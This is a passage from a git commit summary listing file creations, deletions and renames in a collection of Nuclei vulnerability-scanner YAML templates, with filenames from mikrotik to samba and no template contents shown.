delete mode 100644 nuclei-templates/Other/mikrotik-routeros-8873.yaml create mode 100644 nuclei-templates/Other/mikrotik-routeros-8875.yaml create mode 100644 nuclei-templates/Other/minimouse-lfi-8877.yaml delete mode 100644 nuclei-templates/Other/minimouse-lfi.yaml delete mode 100644 nuclei-templates/Other/minio-default-login-8887.yaml create mode 100644 nuclei-templates/Other/minio-default-login.yaml delete mode 100644 nuclei-templates/Other/minio-default-password-8891.yaml create mode 100644 nuclei-templates/Other/minio-default-password.yaml rename nuclei-templates/Other/{mirai-unknown-rce-8898.yaml => mirai-unknown-rce-8899.yaml} (100%) create mode 100644 nuclei-templates/Other/misconfigured-docker-8900.yaml delete mode 100644 nuclei-templates/Other/misconfigured-docker.yaml delete mode 100644 nuclei-templates/Other/mobotix-guest-camera-8911.yaml create mode 100644 nuclei-templates/Other/mobotix-guest-camera.yaml create mode 100644 nuclei-templates/Other/moinmoin-detect-8916.yaml delete mode 100644 nuclei-templates/Other/moinmoin-detect-8917.yaml delete mode 100644 nuclei-templates/Other/monitorix-exposure-8932.yaml create mode 100644 nuclei-templates/Other/monitorix-exposure.yaml delete mode 100644 nuclei-templates/Other/moodle-changelog-8935.yaml create mode 100644 nuclei-templates/Other/moodle-changelog-8936.yaml delete mode 100644 nuclei-templates/Other/moodle-filter-jmol-lfi-8938.yaml create mode 100644 nuclei-templates/Other/moodle-filter-jmol-lfi-8941.yaml delete mode 100644 nuclei-templates/Other/moodle-filter-jmol-xss-8944.yaml create mode 100644 nuclei-templates/Other/moodle-filter-jmol-xss-8945.yaml delete mode 100644 nuclei-templates/Other/moodle-xss-8951.yaml create mode 100644 nuclei-templates/Other/moodle-xss.yaml create mode 100644 nuclei-templates/Other/mpsec-lfi-8954.yaml delete mode 100644 nuclei-templates/Other/mpsec-lfi-8957.yaml delete mode 100644 nuclei-templates/Other/mrtg-detect-8958.yaml create mode 100644 nuclei-templates/Other/mrtg-detect-8959.yaml delete mode 100644 nuclei-templates/Other/ms-exchange-server-reflected-xss-8962.yaml create mode 100644 nuclei-templates/Other/ms-exchange-server-reflected-xss.yaml create mode 100644 nuclei-templates/Other/msvod-sqli-8969.yaml delete mode 100644 nuclei-templates/Other/msvod-sqli.yaml delete mode 100644 nuclei-templates/Other/multiples-swagger-xss-indentify.yaml create mode 100644 nuclei-templates/Other/multipurpose.yaml create mode 100644 nuclei-templates/Other/music-store-open-redirect-8972.yaml delete mode 100644 nuclei-templates/Other/music-store-open-redirect.yaml delete mode 100644 nuclei-templates/Other/mx-service-detector-8975.yaml create mode 100644 nuclei-templates/Other/mx-service-detector.yaml rename nuclei-templates/Other/{my-chatbot-xss-8978.yaml => my-chatbot-xss-8979.yaml} (100%) create mode 100644 nuclei-templates/Other/mysql-native-password-8980.yaml delete mode 100644 nuclei-templates/Other/mysql-native-password.yaml create mode 100644 nuclei-templates/Other/myucms-lfr-8985.yaml delete mode 100644 nuclei-templates/Other/myucms-lfr-8987.yaml delete mode 100644 nuclei-templates/Other/nagios-default-login-8990.yaml create mode 100644 nuclei-templates/Other/nagios-default-login-8991.yaml create mode 100644 nuclei-templates/Other/nagios-status-page-3.yaml delete mode 100644 nuclei-templates/Other/nagios-status-page-8995.yaml create mode 100644 nuclei-templates/Other/nativechurch-wp-theme-lfd-8999.yaml delete mode 100644 nuclei-templates/Other/nativechurch-wp-theme-lfd-9002.yaml rename nuclei-templates/Other/{natshell-path-traversal-9008.yaml => natshell-path-traversal-9005.yaml} (100%) create mode 100644 nuclei-templates/Other/natshell-rce-9012.yaml delete mode 100644 nuclei-templates/Other/natshell-rce.yaml rename nuclei-templates/Other/{neos-detect.yaml => neos-detect-9013.yaml} (100%) delete mode 100644 nuclei-templates/Other/neos-panel-9016.yaml create mode 100644 nuclei-templates/Other/neos-panel.yaml rename nuclei-templates/Other/{nessus-panel-9017.yaml => nessus-panel-9019.yaml} (100%) create mode 100644 nuclei-templates/Other/netdata-dashboard-detected-9021.yaml delete mode 100644 nuclei-templates/Other/netdata-dashboard-detected.yaml delete mode 100644 nuclei-templates/Other/netflix-conductor-ui-9023.yaml create mode 100644 nuclei-templates/Other/netflix-conductor-ui.yaml delete mode 100644 nuclei-templates/Other/netflix-conductor-version-9024.yaml create mode 100644 nuclei-templates/Other/netflix-conductor-version.yaml create mode 100644 nuclei-templates/Other/netflow-analyzer-zoho-traffic-management.yaml delete mode 100644 nuclei-templates/Other/netgear-router-auth-bypass-9025.yaml create mode 100644 nuclei-templates/Other/netgear-router-auth-bypass-9026.yaml create mode 100644 nuclei-templates/Other/netis-router-9037.yaml delete mode 100644 nuclei-templates/Other/netis-router.yaml create mode 100644 nuclei-templates/Other/netlify-takeover-9043.yaml delete mode 100644 nuclei-templates/Other/netlify-takeover-9044.yaml rename nuclei-templates/Other/{Netoray-sqli.yaml => netoray-sqli.yaml} (100%) rename nuclei-templates/Other/{netrc-9046.yaml => netrc.yaml} (100%) create mode 100644 nuclei-templates/Other/netscaler-aaa-login-9050.yaml delete mode 100644 nuclei-templates/Other/netscaler-aaa-login.yaml create mode 100644 nuclei-templates/Other/netscaler-gateway-9052.yaml delete mode 100644 nuclei-templates/Other/netscaler-gateway-9055.yaml delete mode 100644 nuclei-templates/Other/netsurveillance-web-9057.yaml create mode 100644 nuclei-templates/Other/netsurveillance-web.yaml rename nuclei-templates/Other/{netsus-server-login-9061.yaml => netsus-server-login.yaml} (100%) create mode 100644 nuclei-templates/Other/netsweeper-open-redirect-9064.yaml delete mode 100644 nuclei-templates/Other/netsweeper-open-redirect.yaml create mode 100644 nuclei-templates/Other/netsweeper-webadmin-detect-9067.yaml delete mode 100644 nuclei-templates/Other/netsweeper-webadmin-detect.yaml create mode 100644 nuclei-templates/Other/news-flash.yaml create mode 100644 nuclei-templates/Other/newsletter-manager-open-redirect-9075.yaml delete mode 100644 nuclei-templates/Other/newsletter-manager-open-redirect.yaml delete mode 100644 nuclei-templates/Other/newsletter-open-redirect-9078.yaml create mode 100644 nuclei-templates/Other/newsletter-open-redirect.yaml create mode 100644 nuclei-templates/Other/nextcloud-detect-9080.yaml delete mode 100644 nuclei-templates/Other/nextcloud-detect.yaml delete mode 100644 nuclei-templates/Other/nexus-default-login-9086.yaml create mode 100644 nuclei-templates/Other/nexus-default-login-9089.yaml create mode 100644 nuclei-templates/Other/nexus-detect-9094.yaml delete mode 100644 nuclei-templates/Other/nexus-detect-9095.yaml rename nuclei-templates/Other/{nginx-detect.yaml => nginx-Detect.yaml} (100%) create mode 100644 nuclei-templates/Other/nginx-config-9098.yaml delete mode 100644 nuclei-templates/Other/nginx-config-9099.yaml create mode 100644 nuclei-templates/Other/nginx-linux-page-9101.yaml delete mode 100644 nuclei-templates/Other/nginx-linux-page.yaml delete mode 100644 nuclei-templates/Other/nginx-module-vts-xss-9106.yaml create mode 100644 nuclei-templates/Other/nginx-module-vts-xss-9108.yaml create mode 100644 nuclei-templates/Other/nginx-proxy-manager-9114.yaml delete mode 100644 nuclei-templates/Other/nginx-proxy-manager.yaml delete mode 100644 nuclei-templates/Other/nginx-version-9120.yaml create mode 100644 nuclei-templates/Other/nginx-version.yaml create mode 100644 nuclei-templates/Other/nginx_Misconfiguration.yaml create mode 100644 nuclei-templates/Other/ngrok-takeover-9126.yaml delete mode 100644 nuclei-templates/Other/ngrok-takeover.yaml delete mode 100644 nuclei-templates/Other/nifi-detech-9131.yaml create mode 100644 nuclei-templates/Other/nifi-detech.yaml create mode 100644 nuclei-templates/Other/ninjaform-open-redirect-9134.yaml delete mode 100644 nuclei-templates/Other/ninjaform-open-redirect.yaml create mode 100644 nuclei-templates/Other/node-integration-enabled-9137.yaml delete mode 100644 nuclei-templates/Other/node-integration-enabled.yaml create mode 100644 nuclei-templates/Other/node-red-detect-9139.yaml delete mode 100644 nuclei-templates/Other/node-red-detect.yaml create mode 100644 nuclei-templates/Other/npm-log-file-9141.yaml delete mode 100644 nuclei-templates/Other/npm-log-file.yaml delete mode 100644 nuclei-templates/Other/npm.yaml delete mode 100644 nuclei-templates/Other/ns-asg-file-read-9152.yaml create mode 100644 nuclei-templates/Other/ns-asg-file-read-9153.yaml delete mode 100644 nuclei-templates/Other/ntlm-directories-9156.yaml create mode 100644 nuclei-templates/Other/ntlm-directories-9157.yaml delete mode 100644 nuclei-templates/Other/nuuno-network-login-9161.yaml create mode 100644 nuclei-templates/Other/nuuno-network-login-9164.yaml delete mode 100644 nuclei-templates/Other/nuuo-file-inclusion-9169.yaml create mode 100644 nuclei-templates/Other/nuuo-file-inclusion.yaml rename nuclei-templates/Other/{oa-tongda-path-traversal-9177.yaml => oa-tongda-path-traversal-9179.yaml} (100%) create mode 100644 nuclei-templates/Other/oa-v9-uploads-file-9189.yaml delete mode 100644 nuclei-templates/Other/oa-v9-uploads-file.yaml create mode 100644 nuclei-templates/Other/oauth-access-key-9184.yaml delete mode 100644 nuclei-templates/Other/oauth-access-key.yaml rename nuclei-templates/Other/{octobercms-default-login-9192.yaml => octobercms-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/octoprint-login-9197.yaml delete mode 100644 nuclei-templates/Other/octoprint-login.yaml rename nuclei-templates/Other/{odoo-cms-redirect-9201.yaml => odoo-cms-redirect.yaml} (100%) create mode 100644 nuclei-templates/Other/odoo-database-manager-9204.yaml delete mode 100644 nuclei-templates/Other/odoo-database-manager.yaml delete mode 100644 nuclei-templates/Other/ofbiz-default-login-9210.yaml create mode 100644 nuclei-templates/Other/ofbiz-default-login.yaml delete mode 100644 nuclei-templates/Other/office-documents-links.yaml create mode 100644 nuclei-templates/Other/officedocuments.yaml create mode 100644 nuclei-templates/Other/officeweb365.yaml rename nuclei-templates/Other/{oidc-detect-9217.yaml => oidc-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/oipm-detect-9221.yaml create mode 100644 nuclei-templates/Other/oipm-detect.yaml delete mode 100644 nuclei-templates/Other/oki-data-9223.yaml create mode 100644 nuclei-templates/Other/oki-data-9226.yaml create mode 100644 nuclei-templates/Other/okta-panel-9231.yaml delete mode 100644 nuclei-templates/Other/okta-panel-9234.yaml delete mode 100644 nuclei-templates/Other/one_line_checks_nuclei.yaml create mode 100644 nuclei-templates/Other/onliner-multiple-bugs.yaml rename nuclei-templates/Other/{oob-header-based-interaction.yaml => oob-header-based-interaction-9249.yaml} (100%) create mode 100644 nuclei-templates/Other/oob-param-based-interaction-9252.yaml delete mode 100644 nuclei-templates/Other/oob-param-based-interaction-9253.yaml delete mode 100644 nuclei-templates/Other/opcache-status-exposure-9254.yaml create mode 100644 nuclei-templates/Other/opcache-status-exposure-9255.yaml delete mode 100644 nuclei-templates/Other/open-game-panel-9279.yaml create mode 100644 nuclei-templates/Other/open-game-panel.yaml rename nuclei-templates/Other/{open-proxy-internal-9289.yaml => open-proxy-internal-9290.yaml} (100%) delete mode 100644 nuclei-templates/Other/open-proxy-localhost-9292.yaml create mode 100644 nuclei-templates/Other/open-proxy-localhost.yaml delete mode 100644 nuclei-templates/Other/open-proxy-portscan-9295.yaml create mode 100644 nuclei-templates/Other/open-proxy-portscan.yaml delete mode 100644 nuclei-templates/Other/open-redirect-9308.yaml create mode 100644 nuclei-templates/Other/open-redirect-9312.yaml create mode 100644 nuclei-templates/Other/open-virtualization-manager-detect-9325.yaml delete mode 100644 nuclei-templates/Other/open-virtualization-manager-detect.yaml create mode 100644 nuclei-templates/Other/open-virtualization-manager-panel-9327.yaml delete mode 100644 nuclei-templates/Other/open-virtualization-manager-panel.yaml create mode 100644 nuclei-templates/Other/openam-workflow-9258.yaml delete mode 100644 nuclei-templates/Other/openam-workflow-9259.yaml delete mode 100644 nuclei-templates/Other/openapi-2.yaml create mode 100644 nuclei-templates/Other/openapi.yaml delete mode 100644 nuclei-templates/Other/openbmcs-ssrf-9261.yaml create mode 100644 nuclei-templates/Other/openbmcs-ssrf.yaml delete mode 100644 nuclei-templates/Other/opencast-detect-9263.yaml create mode 100644 nuclei-templates/Other/opencast-detect-9265.yaml create mode 100644 nuclei-templates/Other/opencti-lfi-9268.yaml delete mode 100644 nuclei-templates/Other/opencti-lfi.yaml create mode 100644 nuclei-templates/Other/openemr-detect-9271.yaml delete mode 100644 nuclei-templates/Other/openemr-detect-9274.yaml delete mode 100644 nuclei-templates/Other/openerp-database-9277.yaml create mode 100644 nuclei-templates/Other/openerp-database.yaml create mode 100644 nuclei-templates/Other/openrefine.yaml create mode 100644 nuclei-templates/Other/opensis-detect-9313.yaml delete mode 100644 nuclei-templates/Other/opensis-detect-9314.yaml delete mode 100644 nuclei-templates/Other/opensis-lfi-9317.yaml create mode 100644 nuclei-templates/Other/opensis-lfi.yaml delete mode 100644 nuclei-templates/Other/opensns-rce-9320.yaml create mode 100644 nuclei-templates/Other/opensns-rce.yaml delete mode 100644 nuclei-templates/Other/openvpn-hhi-9329.yaml create mode 100644 nuclei-templates/Other/openvpn-hhi.yaml create mode 100644 nuclei-templates/Other/openweather.yaml create mode 100644 nuclei-templates/Other/openwrt-login-9333.yaml delete mode 100644 nuclei-templates/Other/openwrt-login.yaml rename nuclei-templates/Other/{optilink-ont1gew-gpon-rce.yaml => optilink-ont1gew-gpon-rce-9342.yaml} (100%) rename nuclei-templates/Other/{oracle-business-control-9347.yaml => oracle-business-control-9346.yaml} (100%) create mode 100644 nuclei-templates/Other/oracle-dbass-detect-9350.yaml delete mode 100644 nuclei-templates/Other/oracle-dbass-detect-9351.yaml create mode 100644 nuclei-templates/Other/oracle-dbcs-9354.yaml delete mode 100644 nuclei-templates/Other/oracle-dbcs-9355.yaml delete mode 100644 nuclei-templates/Other/oracle-ebs-bispgraph-file-access-9356.yaml create mode 100644 nuclei-templates/Other/oracle-ebs-bispgraph-file-access-9360.yaml delete mode 100644 nuclei-templates/Other/oracle-ebs-credentials-9366.yaml create mode 100644 nuclei-templates/Other/oracle-ebs-credentials.yaml rename nuclei-templates/Other/{oracle-ebs-sqllog-disclosure-9371.yaml => oracle-ebs-sqllog-disclosure-9370.yaml} (100%) create mode 100644 nuclei-templates/Other/oracle-ebs-xss-9376.yaml delete mode 100644 nuclei-templates/Other/oracle-ebs-xss-9377.yaml delete mode 100644 nuclei-templates/Other/oracle-fatwire-lfi-9378.yaml create mode 100644 nuclei-templates/Other/oracle-fatwire-lfi-9379.yaml create mode 100644 nuclei-templates/Other/oracle-http-server-12c-9382.yaml delete mode 100644 nuclei-templates/Other/oracle-http-server-12c-9384.yaml create mode 100644 nuclei-templates/Other/oracle-integrated-manager-9389.yaml delete mode 100644 nuclei-templates/Other/oracle-integrated-manager-9390.yaml rename nuclei-templates/Other/{oracle-iplanet-web-server.yaml => oracle-iplanet-web-server-9392.yaml} (100%) delete mode 100644 nuclei-templates/Other/oracle-people-enterprise-9394.yaml create mode 100644 nuclei-templates/Other/oracle-people-enterprise.yaml delete mode 100644 nuclei-templates/Other/oracle-people-sign-in-9399.yaml create mode 100644 nuclei-templates/Other/oracle-people-sign-in.yaml create mode 100644 nuclei-templates/Other/oracle-siebel-xss-9400.yaml delete mode 100644 nuclei-templates/Other/oracle-siebel-xss.yaml create mode 100644 nuclei-templates/Other/oracle-tns-listener.yaml delete mode 100644 nuclei-templates/Other/oracle-tns-listner.yaml delete mode 100644 nuclei-templates/Other/orbiteam-bscw-server-lfi-9404.yaml create mode 100644 nuclei-templates/Other/orbiteam-bscw-server-lfi.yaml create mode 100644 nuclei-templates/Other/orchid-store.yaml create mode 100644 nuclei-templates/Other/oscommerce-rce-9405.yaml delete mode 100644 nuclei-templates/Other/oscommerce-rce.yaml delete mode 100644 nuclei-templates/Other/otobo-open-redirect-9409.yaml create mode 100644 nuclei-templates/Other/otobo-open-redirect-9410.yaml create mode 100644 nuclei-templates/Other/owasp-juice-shop-detected-9418.yaml delete mode 100644 nuclei-templates/Other/owasp-juice-shop-detected.yaml delete mode 100644 nuclei-templates/Other/owncloud-config-9420.yaml create mode 100644 nuclei-templates/Other/owncloud-config.yaml create mode 100644 nuclei-templates/Other/package-json-9422.yaml delete mode 100644 nuclei-templates/Other/package-json-9423.yaml create mode 100644 nuclei-templates/Other/pacsone-server-lfi-9428.yaml delete mode 100644 nuclei-templates/Other/pacsone-server-lfi-9429.yaml create mode 100644 nuclei-templates/Other/pagerduty.yaml delete mode 100644 nuclei-templates/Other/pagespeed-global-admin-9433.yaml create mode 100644 nuclei-templates/Other/pagespeed-global-admin.yaml delete mode 100644 nuclei-templates/Other/panabit-default-login-9437.yaml create mode 100644 nuclei-templates/Other/panabit-default-login-9438.yaml create mode 100644 nuclei-templates/Other/panabit-panalog.yaml create mode 100644 nuclei-templates/Other/panabit-panel-9444.yaml delete mode 100644 nuclei-templates/Other/panabit-panel-9445.yaml delete mode 100644 nuclei-templates/Other/panabit-sy_addmount-rce.yaml rename nuclei-templates/Other/{panalog-fileread.yaml => panalog-fileRead.yaml} (100%) delete mode 100644 nuclei-templates/Other/pandora-fms-console-9451.yaml create mode 100644 nuclei-templates/Other/pandora-fms-console.yaml create mode 100644 nuclei-templates/Other/panos-default-login-9454.yaml delete mode 100644 nuclei-templates/Other/panos-default-login-9457.yaml delete mode 100644 nuclei-templates/Other/pantheon-takeover-9458.yaml create mode 100644 nuclei-templates/Other/pantheon-takeover-9459.yaml delete mode 100644 nuclei-templates/Other/parallels-html-client-9462.yaml create mode 100644 nuclei-templates/Other/parallels-html-client-9464.yaml create mode 100644 nuclei-templates/Other/parentlink-xss-9466.yaml delete mode 100644 nuclei-templates/Other/parentlink-xss-9467.yaml delete mode 100644 nuclei-templates/Other/path-traversal.yaml rename nuclei-templates/Other/{paypal-braintree-token-11856.yaml => paypal-braintree-token(1).yaml} (100%) delete mode 100644 nuclei-templates/Other/pbootcms-database-file-download-9469.yaml create mode 100644 nuclei-templates/Other/pbootcms-database-file-download.yaml create mode 100644 nuclei-templates/Other/pdf-signer-ssti-to-rce-9471.yaml delete mode 100644 nuclei-templates/Other/pdf-signer-ssti-to-rce.yaml rename nuclei-templates/Other/{pentaho-default-login-9480.yaml => pentaho-default-login-9478.yaml} (100%) create mode 100644 nuclei-templates/Other/phalcon-framework-source-9494.yaml delete mode 100644 nuclei-templates/Other/phalcon-framework-source-9495.yaml delete mode 100644 nuclei-templates/Other/php-backup-files-9498.yaml create mode 100644 nuclei-templates/Other/php-backup-files.yaml delete mode 100644 nuclei-templates/Other/php-errors-9511.yaml create mode 100644 nuclei-templates/Other/php-errors.yaml delete mode 100644 nuclei-templates/Other/php-ini-9524.yaml create mode 100644 nuclei-templates/Other/php-ini.yaml rename nuclei-templates/Other/{php-proxy-detect-1.yaml => php-proxy-detect-9544.yaml} (100%) delete mode 100644 nuclei-templates/Other/php-timeclock-xss-9552.yaml create mode 100644 nuclei-templates/Other/php-timeclock-xss.yaml rename nuclei-templates/Other/{php-user-ini-disclosure-9559.yaml => php-user-ini-disclosure-9561.yaml} (100%) delete mode 100644 nuclei-templates/Other/php-zerodium-backdoor-rce-9570.yaml create mode 100644 nuclei-templates/Other/php-zerodium-backdoor-rce-9572.yaml delete mode 100644 nuclei-templates/Other/phpMyAdmin-setup.yaml delete mode 100644 nuclei-templates/Other/phpcollab-workflow-9502.yaml create mode 100644 nuclei-templates/Other/phpcollab-workflow.yaml delete mode 100644 nuclei-templates/Other/phpinfo-9519.yaml create mode 100644 nuclei-templates/Other/phpinfo-files.yaml create mode 100644 nuclei-templates/Other/phpmyadmin-panel-9525.yaml delete mode 100644 nuclei-templates/Other/phpmyadmin-panel-9526.yaml delete mode 100644 nuclei-templates/Other/phpmyadmin-server-import.yaml create mode 100644 nuclei-templates/Other/phpmyadmin-setup-11857.yaml delete mode 100644 nuclei-templates/Other/phpunit-9557.yaml create mode 100644 nuclei-templates/Other/phpunit-9558.yaml rename nuclei-templates/Other/{phpwiki-lfi-9566.yaml => phpwiki-lfi-9564.yaml} (100%) create mode 100644 nuclei-templates/Other/pi-hole-detect-9582.yaml delete mode 100644 nuclei-templates/Other/pi-hole-detect-9583.yaml delete mode 100644 nuclei-templates/Other/pictatic-api-key-9576.yaml create mode 100644 nuclei-templates/Other/pictatic-api-key.yaml create mode 100644 nuclei-templates/Other/pieregister-open-redirect-9577.yaml delete mode 100644 nuclei-templates/Other/pieregister-open-redirect-9578.yaml create mode 100644 nuclei-templates/Other/pieregister-plugin-open-redirect.yaml create mode 100644 nuclei-templates/Other/plastic-scm-login-9593.yaml delete mode 100644 nuclei-templates/Other/plastic-scm-login.yaml rename nuclei-templates/Other/{plesk-obsidian-9594.yaml => plesk-obsidian-9596.yaml} (100%) delete mode 100644 nuclei-templates/Other/plesk-onyx-9601.yaml create mode 100644 nuclei-templates/Other/plesk-onyx-login.yaml rename nuclei-templates/Other/{plesk-stat-9604.yaml => plesk-stat-9603.yaml} (100%) create mode 100644 nuclei-templates/Other/plone-cms-detect-9606.yaml delete mode 100644 nuclei-templates/Other/plone-cms-detect.yaml create mode 100644 nuclei-templates/Other/pma-server-import.yaml delete mode 100644 nuclei-templates/Other/pmb-directory-traversal-9612.yaml create mode 100644 nuclei-templates/Other/pmb-directory-traversal-9613.yaml delete mode 100644 nuclei-templates/Other/pmb-local-file-disclosure-9617.yaml create mode 100644 nuclei-templates/Other/pmb-local-file-disclosure.yaml create mode 100644 nuclei-templates/Other/pollbot-redirect-9623.yaml delete mode 100644 nuclei-templates/Other/pollbot-redirect.yaml rename nuclei-templates/Other/{polycom-login-9625.yaml => polycom-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/portainer-init-deploy-9628.yaml create mode 100644 nuclei-templates/Other/portainer-init-deploy-9633.yaml create mode 100644 nuclei-templates/Other/postmark.yaml rename nuclei-templates/Other/{postmessage-tracker-9640.yaml => postmessage-tracker.yaml} (100%) create mode 100644 nuclei-templates/Other/powercreator-cms-rce-9644.yaml delete mode 100644 nuclei-templates/Other/powercreator-cms-rce-9647.yaml create mode 100644 nuclei-templates/Other/powerlogic-ion-9650.yaml delete mode 100644 nuclei-templates/Other/powerlogic-ion.yaml rename nuclei-templates/Other/{private-key.yaml => private-key-9655.yaml} (100%) create mode 100644 nuclei-templates/Other/processmaker-lfi-9662.yaml delete mode 100644 nuclei-templates/Other/processmaker-lfi.yaml delete mode 100644 nuclei-templates/Other/proftpd-config-9667.yaml create mode 100644 nuclei-templates/Other/proftpd-config.yaml create mode 100644 nuclei-templates/Other/prometheus-config-9673.yaml delete mode 100644 nuclei-templates/Other/prometheus-config.yaml create mode 100644 nuclei-templates/Other/prometheus-exporter-9678.yaml create mode 100644 nuclei-templates/Other/prometheus-exporter-detect-9676.yaml delete mode 100644 nuclei-templates/Other/prometheus-exporter-detect.yaml delete mode 100644 nuclei-templates/Other/prometheus-exporter.yaml create mode 100644 nuclei-templates/Other/prometheus-exposed-panel-9684.yaml delete mode 100644 nuclei-templates/Other/prometheus-exposed-panel.yaml delete mode 100644 nuclei-templates/Other/prometheus-flags-9687.yaml create mode 100644 nuclei-templates/Other/prometheus-flags.yaml create mode 100644 nuclei-templates/Other/proposify-takeover-9693.yaml delete mode 100644 nuclei-templates/Other/proposify-takeover.yaml rename nuclei-templates/Other/{prtg-detect.yaml => prtg-detect-9706.yaml} (100%) delete mode 100644 nuclei-templates/Other/pulse-secure-panel-9714.yaml create mode 100644 nuclei-templates/Other/pulse-secure-panel-9715.yaml create mode 100644 nuclei-templates/Other/puppet-node-manager-detect-9720.yaml delete mode 100644 nuclei-templates/Other/puppet-node-manager-detect.yaml rename nuclei-templates/Other/{puppetserver-detect-9722.yaml => puppetserver-detect-9721.yaml} (100%) create mode 100644 nuclei-templates/Other/put-m-enb.yaml delete mode 100644 nuclei-templates/Other/put-method-enabled-9728.yaml delete mode 100644 nuclei-templates/Other/pyspider-unauthorized-access-9743.yaml create mode 100644 nuclei-templates/Other/pyspider-unauthorized-access.yaml delete mode 100644 nuclei-templates/Other/python-app-sql-exceptions-9744.yaml create mode 100644 nuclei-templates/Other/python-app-sql-exceptions.yaml rename nuclei-templates/Other/{python-metrics-9745.yaml => python-metrics-9747.yaml} (100%) create mode 100644 nuclei-templates/Other/qdpm-info-leak-9753.yaml delete mode 100644 nuclei-templates/Other/qdpm-info-leak.yaml delete mode 100644 nuclei-templates/Other/qi-anxin-netkang-next-generation-firewall-rce-9759.yaml create mode 100644 nuclei-templates/Other/qi-anxin-netkang-next-generation-firewall-rce-9761.yaml rename nuclei-templates/Other/{qihang-media-upload_all.yaml => qihang-media-upload.yaml} (100%) rename nuclei-templates/Other/{qizhi-login-byPass.yaml => qizhi-login-bypass.yaml} (100%) delete mode 100644 nuclei-templates/Other/rabbitmq-dashboard-9778.yaml create mode 100644 nuclei-templates/Other/rabbitmq-dashboard.yaml rename nuclei-templates/Other/{rabbitmq-default-admin.yaml => rabbitmq-default-admin-9780.yaml} (100%) rename nuclei-templates/Other/{rabbitmq-default-login-9786.yaml => rabbitmq-default-login-9783.yaml} (100%) delete mode 100644 nuclei-templates/Other/race-multiple.yaml create mode 100644 nuclei-templates/Other/race-simple.yaml delete mode 100644 nuclei-templates/Other/rack-mini-profiler-9793.yaml create mode 100644 nuclei-templates/Other/rack-mini-profiler.yaml delete mode 100644 nuclei-templates/Other/radius-manager-9795.yaml create mode 100644 nuclei-templates/Other/radius-manager.yaml rename nuclei-templates/Other/{rails-database-config-9802.yaml => rails-database-config-9804.yaml} (100%) create mode 100644 nuclei-templates/Other/rails-debug-mode-9807.yaml delete mode 100644 nuclei-templates/Other/rails-debug-mode.yaml delete mode 100644 nuclei-templates/Other/rails6-xss-9797.yaml create mode 100644 nuclei-templates/Other/rails6-xss-9800.yaml create mode 100644 nuclei-templates/Other/rancher-panel-9817.yaml delete mode 100644 nuclei-templates/Other/rancher-panel.yaml create mode 100644 nuclei-templates/Other/ranger-default-login-9828.yaml delete mode 100644 nuclei-templates/Other/ranger-default-login.yaml delete mode 100644 nuclei-templates/Other/ranger-detection-9829.yaml create mode 100644 nuclei-templates/Other/ranger-detection.yaml create mode 100644 nuclei-templates/Other/raw-get.yaml delete mode 100644 nuclei-templates/Other/rce-cve-2021-41773.yaml create mode 100644 nuclei-templates/Other/rconfig-rce-9836.yaml delete mode 100644 nuclei-templates/Other/rconfig-rce-9837.yaml delete mode 100644 nuclei-templates/Other/rdf-user-enumeration.yaml delete mode 100644 nuclei-templates/Other/readme-takeover-9841.yaml create mode 100644 nuclei-templates/Other/readme-takeover.yaml delete mode 100644 nuclei-templates/Other/readthedocs-takeover-9846.yaml create mode 100644 nuclei-templates/Other/readthedocs-takeover-9847.yaml create mode 100644 nuclei-templates/Other/readynas_surveillance.yaml delete mode 100644 nuclei-templates/Other/redash-detection.yaml create mode 100644 nuclei-templates/Other/redash-panel.yaml rename nuclei-templates/Other/{redcap-detector-9849.yaml => redcap-detector-9850.yaml} (100%) create mode 100644 nuclei-templates/Other/reflected-headers.yaml delete mode 100644 nuclei-templates/Other/reflected-params.yaml rename nuclei-templates/Other/{request-based-interaction-9862.yaml => request-based-interaction.yaml} (100%) delete mode 100644 nuclei-templates/Other/resin-cnnvd-200705-315-9865.yaml create mode 100644 nuclei-templates/Other/resin-cnnvd-200705-315-9867.yaml rename nuclei-templates/Other/{resin-viewfile-lfr-9874.yaml => resin-viewfile-lfr.yaml} (100%) delete mode 100644 nuclei-templates/Other/robomongo-credential-9884.yaml create mode 100644 nuclei-templates/Other/robomongo-credential-9885.yaml delete mode 100644 nuclei-templates/Other/robots-txt-9888.yaml create mode 100644 nuclei-templates/Other/robots-txt.yaml rename nuclei-templates/Other/{rocketmq-console-exposure-9894.yaml => rocketmq-console-exposure.yaml} (100%) delete mode 100644 nuclei-templates/Other/rockmongo-default-login-9897.yaml create mode 100644 nuclei-templates/Other/rockmongo-default-login-9899.yaml create mode 100644 nuclei-templates/Other/roundcube-log-disclosure-9905.yaml delete mode 100644 nuclei-templates/Other/roundcube-log-disclosure.yaml rename nuclei-templates/Other/{routeros-login.yaml => routeros-login-9909.yaml} (100%) rename nuclei-templates/Other/{rstudio-detect-9917.yaml => rstudio-detect-9919.yaml} (100%) delete mode 100644 nuclei-templates/Other/ruijie-EG-fileDown.yaml create mode 100644 nuclei-templates/Other/ruijie-eg-filedown.yaml rename nuclei-templates/Other/{ruijie-eg-password-leak-9922.yaml => ruijie-eg-password-leak.yaml} (100%) create mode 100644 nuclei-templates/Other/ruijie-information-disclosure-9931.yaml delete mode 100644 nuclei-templates/Other/ruijie-information-disclosure-9932.yaml create mode 100644 nuclei-templates/Other/ruijie-networks-lfi-9938.yaml delete mode 100644 nuclei-templates/Other/ruijie-networks-lfi-9940.yaml create mode 100644 nuclei-templates/Other/ruijie-networks-rce-9943.yaml delete mode 100644 nuclei-templates/Other/ruijie-networks-rce-9949.yaml delete mode 100644 nuclei-templates/Other/ruijie-phpinfo-9951.yaml create mode 100644 nuclei-templates/Other/ruijie-phpinfo.yaml delete mode 100644 nuclei-templates/Other/rusty-joomla-9955.yaml create mode 100644 nuclei-templates/Other/rusty-joomla.yaml create mode 100644 nuclei-templates/Other/s3-subtakeover-9967.yaml delete mode 100644 nuclei-templates/Other/s3-subtakeover.yaml create mode 100644 nuclei-templates/Other/s3cmd-config-9961.yaml delete mode 100644 nuclei-templates/Other/s3cmd-config.yaml delete mode 100644 nuclei-templates/Other/saferoads-vms-login-9971.yaml create mode 100644 nuclei-templates/Other/saferoads-vms-login.yaml create mode 100644 nuclei-templates/Other/sage-detect-9975.yaml delete mode 100644 nuclei-templates/Other/sage-detect-9977.yaml create mode 100644 nuclei-templates/Other/salesforce-aura-9981.yaml delete mode 100644 nuclei-templates/Other/salesforce-aura.yaml delete mode 100644 nuclei-templates/Other/samba-config-9987.yaml create mode 100644 nuclei-templates/Other/samba-config.yaml delete mode 100644 nuclei-templates/Other/samba-detect-9988.yaml create mode 100644 